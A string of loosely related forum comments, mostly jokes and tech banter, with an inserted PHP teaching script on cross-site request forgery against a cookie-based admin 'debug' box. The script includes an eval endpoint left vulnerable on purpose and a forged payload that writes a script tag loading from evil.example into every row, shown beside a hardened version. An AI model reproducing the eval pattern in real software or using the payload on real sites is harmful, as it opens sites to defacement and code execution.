no way -- GET OFF MY LAWN!! damn hippies. if your hippy girlfriend has free love, then i've got a free room. she has to use the bucket first tho
and lets you come up with your own designs. like the internet made everyone a publisher, this could make everyone a manufacturer. write your own books and distribute online, design your own gun model and distribute online. watch out, the next **AA will be the NRAA.
this person owns their own business. he's not an advanced dev by any stretch of the imagination. he doesn't use version control, he's just starting to discover "frameworks" though i don't know if he really understands the concept yet. he taped together some php code that let him set a cookie marking himself as an admin, and a setting variable that allowed him to "debug" his code. this was essentially a form box at the bottom of the page that let him run arbitrary code at certain points -- all for the sake of not swapping back to his code editor, saving, swapping back to the browser, refreshing. the site that got attacked was so small i don't know how he was found. my guess is he posted for help on a bunch of forums and left links to his site. i thought it was funny that there was some pdo code in the site, because he'd outsourced to india for a couple months to handle his workload. i've known him for longer than i've known how to code and he has a pride issue with asking me for help in that area.
if you have a form input box that lets you update variable values with ajax as if it were firebug, you can skip prepared statements. the overall point is that with enough ignorance and carelessness you can build an app that lets someone abuse every major vulnerability, while still thinking that you're secure, even using prepared statements for your own queries.
i'm not sure where everyone is getting xss from. i said cross-site request forgery, that's csrf. and yes, this person's app was (very poorly) written in php.
i referred to a csrf, not xss. although this poor dev's little hand-drawn admin mode was also vulnerable to xss. it was a nightmare to look at.
i think it's jerk, jerk, jerk and maybe ...
both obama and romney gave that answer when asked "what the fuck are you doing here?"
marijuana resin can be used to make plastics stronger than steel. henry ford made a car body out of it and demonstrated it with a sledgehammer: http://www.youtube.com/watch?v=xRIvGxCLHGI
prepared statements work great for almost every sql injection attack, but they are not the silver bullet. the structure of your app could allow an xss attack to run a query that doesn't use them, for instance.
i've also seen some really nasty sql injection attacks using declare, cast and exec to traverse every db, every row, every column and replace every value with an html script tag referencing a foreign-hosted javascript file -- all stemming from a cross-site request forgery that allowed the attacker to run the app as an admin in "debug" mode. almost everything that went wrong with that problem was caused by application architecture.
the reality is most devs don't get to learn about these things until it happens to them. roll that in your eula and smoke it.
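The two comments above about the "debug" form box and about prepared statements not being a silver bullet describe the same architecture: admin status decided by a cookie, and a debug input that executes whatever is posted, so a forged cross-site POST runs as the admin and never touches the app's prepared statements. The script below is an added example, not the app from the comments, written to show that pattern next to a hardened equivalent. The table, the forged request, the hostname evil.example and the function names are constructed for illustration; it assumes PHP with the pdo_sqlite driver available.

```php
<?php
// Added example (not the original app): the cookie-admin + debug-box pattern
// from the comments, and a hardened handler beside it. All names constructed.

function setup_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO posts (title) VALUES ('hello'), ('world')");
    return $pdo;
}

// --- Vulnerable: the pattern the comments describe ---------------------------
// "admin" is a cookie, so the browser attaches it to a forged cross-site POST
// automatically. DEBUG turns a form field into an execution point; the PDO
// prepared statements used elsewhere in the app are simply bypassed.
const DEBUG = true;

function handle_vulnerable(PDO $pdo, array $cookie, array $post): void {
    $is_admin = ($cookie['admin'] ?? '') === '1';
    if ($is_admin && DEBUG && isset($post['debug'])) {
        eval($post['debug']);   // arbitrary PHP, with $pdo in scope
    }
}

// --- Hardened ----------------------------------------------------------------
// Admin state lives in the server-side session, each state-changing POST must
// carry a token the attacker's origin cannot read, and there is no generic
// "run this" endpoint: the only admin action is one fixed parameterised query.
function handle_hardened(PDO $pdo, array $session, array $post): bool {
    if (empty($session['is_admin'])) {
        return false;
    }
    $token_ok = isset($post['csrf'], $session['csrf'])
        && hash_equals($session['csrf'], $post['csrf']);
    if (!$token_ok) {
        return false;           // forged request: no token, rejected
    }
    $stmt = $pdo->prepare('UPDATE posts SET title = :title WHERE id = :id');
    $stmt->execute([':title' => (string)($post['title'] ?? ''), ':id' => (int)($post['id'] ?? 0)]);
    return $stmt->rowCount() === 1;
}

function all_titles(PDO $pdo): array {
    return $pdo->query('SELECT title FROM posts ORDER BY id')->fetchAll(PDO::FETCH_COLUMN);
}

// --- Simulated forged request (constructed) ----------------------------------
// A hidden auto-submitting form on another site sends this POST while the admin
// is logged in. The payload mirrors the mass defacement in the comment above:
// every title replaced with a script tag pointing at a foreign host.
$forged_post = [
    'debug' => '$pdo->exec("UPDATE posts SET title = \'<script src=\"http://evil.example/x.js\"></script>\'");',
];

$pdo = setup_db();
handle_vulnerable($pdo, ['admin' => '1'], $forged_post);
echo "vulnerable:       ", implode(' | ', all_titles($pdo)), "\n";

$pdo = setup_db();
$session = ['is_admin' => true, 'csrf' => bin2hex(random_bytes(32))];
$ok = handle_hardened($pdo, $session, ['title' => 'x', 'id' => 1]);          // no token
echo "hardened, forged: ", var_export($ok, true), "  ", implode(' | ', all_titles($pdo)), "\n";
$ok = handle_hardened($pdo, $session, ['title' => 'edited', 'id' => 1, 'csrf' => $session['csrf']]);
echo "hardened, legit:  ", var_export($ok, true), "  ", implode(' | ', all_titles($pdo)), "\n";
```

Run it with `php example.php`: the first line shows both rows overwritten with the script tag after a single forged POST, the second shows the same request rejected by the token check, and the third shows a legitimate edit going through the one parameterised statement. The point the comments make holds here: the prepared statement in the hardened handler is not what stops the attack, the removal of the execution point and the CSRF token are.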
you mean PCI compliance. it's not a law, though some states have laws that borrow heavily from this standard.
http://www.pcicomplianceguide.org/security-tips-20090227-pci-compliance-law.php
Most people in the South?...
If so, that could still mean he's overweight.
FTFY
are you sure you're not confusing this story with this one? http://science.slashdot.org/story/12/08/15/0447228/widely-used-antibacterial-chemical-may-impair-muscle-function
AND, it's not called Vegas, it's LAS Vegas. take your medicine, mcgrew. take it. do it now.
what do you mean, you people?
pdfs are supposed to be rich formatted text documents that can embed images, nothing more. by allowing document creators to embed javascript, they open this medium up to many of the same, and some unique, attack vectors. here's just one example that made the news: http://www.zdnet.com/blog/security/adobe-confirms-pdf-zero-day-attacks-disable-javascript-now/5119. the same poisoned pdfs when rendered through a pdf reader without javascript execution capabilities are harmless. it doesn't really matter how the bad javascript code got there (just that it can be executed if it is there), but your info about livecycle-produced pdfs is interesting.
imho it got out of control when they added executable javascript.
good point. anyone with enough money to make this happen is going to give you the version of history that they wrote.
a little too excited to get this story out. as soon as "justin bieber" entered his mental typing buffer the whole machinery took a giant crap.
chris farley died of an overdose on a mixture of cocaine and heroin known as a speedball. coincidentally, john belushi, another overweight comedic actor, died the same way. it could be argued that depression led to the excessive use of these drugs, but the cause of death is officially drug overdose. not suicide.
really? the headline was enough clue for me to know the article is bullshit.
patenting the buttprint authentication system for toilets. nobody but you will be allowed to use the commode.
version 2: hydrofluoric acid bidet security countermeasure and automatic facebook update (frees up your hands for, uhh, other activities...).
false buttprint matches will still be identified via facebook, so your countermeasure incident is posted automatically too. connects to facebook via google TiSP http://www.google.com/onceuponatime/tisp/
product slogan: protect your shit! crowdsource me plz, you can reach me at those.are.my.stains@buttprintz.com.
OH SO SORRY! the url is in all lowercase. hope you don't get an aneurysm.
http://tech.slashdot.org/story/11/07/13/1527242/bill-gates-looks-to-reinvent-the-toilet
kill two birds and make it big enough to flush ballmer
The easiest way to ensure ongoing access to Flash Player on Android 4.0 or earlier devices [http://www.adobe.com/go/certifieddevices] is to use certified devices and ensure that the Flash Player is either pre-installed by the manufacturer or installed from Google Play Store before August 15th. If a device is upgraded from Android 4.0 to Android 4.1, the current version of Flash Player may exhibit unpredictable behavior, as it is not certified for use with Android 4.1. Future updates to Flash Player will not work. We recommend uninstalling Flash Player on devices which have been upgraded to Android 4.1.